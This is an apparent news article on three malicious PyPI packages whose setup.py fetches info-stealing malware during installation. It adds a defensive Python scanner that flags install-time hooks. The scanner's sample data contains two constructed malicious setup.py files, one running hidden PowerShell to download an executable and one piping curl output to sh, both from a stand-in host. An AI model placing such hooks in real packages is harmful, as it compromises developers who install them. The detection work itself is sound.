A threat actor has uploaded three malicious packages to the PyPI (Python Package Index) repository. The packages reportedly drop info-stealing malware on developers’ systems.
The threat is significant, according to BleepingComputer, as PyPI is the most widely used repository for Python packages, which are used by software developers to source the building blocks of their projects.
BleepingComputer attributes the discovery to Fortinet, whose FortiGuard Labs team describes the finding as a new 0-day attack embedded in PyPI packages. According to the report, the malicious packages ‘colorslib’ and ‘httpslib’ were published on January 7, with ‘libhttps’ following on January 12.
Fortinet reports that all three were published by the same author, ‘Lolip0p’, as shown in the official PyPI repository. ‘Lolip0p’ joined the repository close to the publishing date.
Targeting most developers
BleepingComputer points out that the popularity of PyPI attracts threat actors who wish to reach a large number of developers and projects at once. Cybercriminals upload malicious packages disguised as legitimate software, or impersonate well-known projects by publishing under near-identical names (typosquatting), so that a single mistyped ‘pip install’ pulls in the malicious package instead.
To make matters worse, PyPI does not have the resources to analyze and vet every package upload. It relies largely on user reports to find and remove malicious files, and by the time a bad package has been identified and removed it has usually accumulated several hundred downloads.
The three malicious packages identified by Fortinet are particularly dangerous because the threat actors took the time to write complete descriptions. This attention to detail helps trick developers into believing malicious packages are legitimate resources.
All three packages carry malicious code in their ‘setup.py’, which means it runs during ‘pip install’ itself, before the developer ever imports the package. The code attempts to launch PowerShell (so Windows developers are the intended victims) and fetch an executable named ‘Oxyz.exe’ from a suspicious URL. This particular piece of malware steals browser information, according to BleepingComputer.
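The install-time hook described above is the part a practitioner can check for before running ‘pip install’. The following is an added example for this article, not Fortinet's or BleepingComputer's tooling: it parses a setup.py with Python's ast module and flags calls into subprocess/os.system/exec, string literals that mention PowerShell or carry a URL, and (going beyond the case on the page) setuptools ‘cmdclass’ overrides, another common way to run code on install. The setup.py samples embedded below are constructed for the demo and are not the real Lolip0p payload; the URLs use the reserved ‘example.invalid’ domain.

```python
"""Heuristic scan of a setup.py for install-time code execution.

Added example; not Fortinet's or BleepingComputer's code. The embedded
setup.py samples are constructed for the demo, not the real payload.
Usage: python scan_setup.py [path/to/setup.py]   (no path: scans SAMPLE_SETUP_PY)
"""
import ast
import re
import sys

# Calls that hand control to a shell, a child process or dynamic code.
# Only the plain 'module.attr' and bare-name forms are matched; aliased
# imports ('from subprocess import Popen as p') are a known gap (assumption).
SUSPICIOUS_CALLS = {
    "subprocess.Popen", "subprocess.run", "subprocess.call",
    "subprocess.check_call", "subprocess.check_output",
    "os.system", "os.popen", "exec", "eval", "__import__",
}
# setuptools command classes a package can subclass to run code on install.
INSTALL_HOOK_BASES = {"install", "develop", "egg_info", "build_py"}
URL_RE = re.compile(r"https?://[^\s\"']+")


def _call_name(node):
    """Return 'module.attr' or 'name' for a call target, else None."""
    func = node.func
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return f"{func.value.id}.{func.attr}"
    if isinstance(func, ast.Name):
        return func.id
    return None


def scan_setup_py(source):
    """Return sorted (line, reason) findings for one setup.py source text."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, f"call to {name}"))
            # setup(cmdclass={...}) registers custom command classes.
            if name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append((node.lineno, "setup() overrides cmdclass"))
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = base.attr if isinstance(base, ast.Attribute) else getattr(base, "id", None)
                if base_name in INSTALL_HOOK_BASES:
                    findings.append((node.lineno,
                                     f"class {node.name} subclasses setuptools command {base_name}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if "powershell" in node.value.lower():
                findings.append((node.lineno, "string literal invokes PowerShell"))
            for url in URL_RE.findall(node.value):
                findings.append((node.lineno, f"string literal carries URL {url}"))
    return sorted(findings)


# Constructed sample mimicking the pattern the article describes: setup.py
# spawns PowerShell to download an executable before calling setup().
SAMPLE_SETUP_PY = '''
from setuptools import setup
import subprocess

try:
    subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-Command",
                      "Invoke-WebRequest http://example.invalid/drop.exe -OutFile drop.exe"])
except Exception:
    pass

setup(name="demo-pkg", version="0.1", packages=[])
'''

# Constructed sample of the other common hook: a custom install command.
HOOK_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        __import__("os").system("curl http://example.invalid/x | sh")

setup(name="demo-pkg", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign sample; should produce no findings.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="demo-pkg", version="0.1", packages=["demo"])
'''


def main(argv):
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8") as fh:
            source = fh.read()
    else:
        source = SAMPLE_SETUP_PY
    for line, reason in scan_setup_py(source):
        print(f"line {line}: {reason}")


if __name__ == "__main__":
    main(sys.argv)
```

Run it against a package obtained with ‘pip download --no-deps <name>’ and unpacked, rather than against an installed copy, since installation is exactly the step that executes setup.py. A clean result is not proof of safety (obfuscated or aliased calls will slip past this heuristic), but any hit on a freshly published package from a new author is reason to stop and read the file.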
Fortinet warns Python users that they “should always perform due diligence before downloading and running any packages, especially from new authors. And as can be seen, publishing more than one package in a short time period is no indication that an author is reliable”.